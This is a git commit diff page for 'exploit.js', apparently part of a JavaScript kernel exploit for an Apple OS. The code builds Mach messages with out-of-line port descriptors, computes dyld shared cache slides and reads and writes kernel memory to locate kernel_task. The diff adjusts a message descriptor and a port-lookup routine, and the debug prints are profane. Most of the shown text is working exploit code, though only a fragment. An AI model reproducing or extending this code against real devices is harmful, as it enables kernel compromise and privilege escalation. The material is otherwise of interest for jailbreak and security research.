summaryrefslogtreecommitdiff
path: root/src/js/kexp/exploit.js
diff options
context:
space:
mode:
Diffstat (limited to 'src/js/kexp/exploit.js')
-rwxr-xr-xsrc/js/kexp/exploit.js7
1 files changed, 3 insertions, 4 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 473bc6e..6a48f23 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -330,7 +330,7 @@ function r3gister(task, init_port_set, real_count, fake_count) {
write_u32(InP + 0x18, 1);
write_u32(InP + 0x1c, init_port_set);
write_u32(InP + 0x20, real_count);
- write_u32(InP + 0x24, 0x0213c600);
+ write_u32(InP + 0x24, ((19 << 16) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 24)));
write_u32(InP + 0x28, read_u32(NDR_record + get_dyld_shc_slide() + 0x0));
write_u32(InP + 0x2c, read_u32(NDR_record + get_dyld_shc_slide() + 0x4));
write_u32(InP + 0x30, fake_count);
@@ -349,10 +349,8 @@ function r3gister(task, init_port_set, real_count, fake_count) {
function mach_ports_lookup_shit() {
printf("fuck\n");
var arrz = shit_heap(4);
- var arrz2 = shit_heap(4);
printf("fuck\n");
- write_u32(arrz, arrz2);
- write_u32(arrz2, 0);
+ write_u32(arrz, 0);
printf("fuck\n");
var sz = shit_heap(4);;
printf("fuck\n");
@@ -365,6 +363,7 @@ function mach_ports_lookup_shit() {
printf("mpl success\n");
return read_u32(read_u32(arrz) + 8);
+// return 0x42603;
}
var kernel_task_addr = 0;
generated by cgit v1.2.3 (git 2.39.1) at 2025-11-30 20:48:14 +0000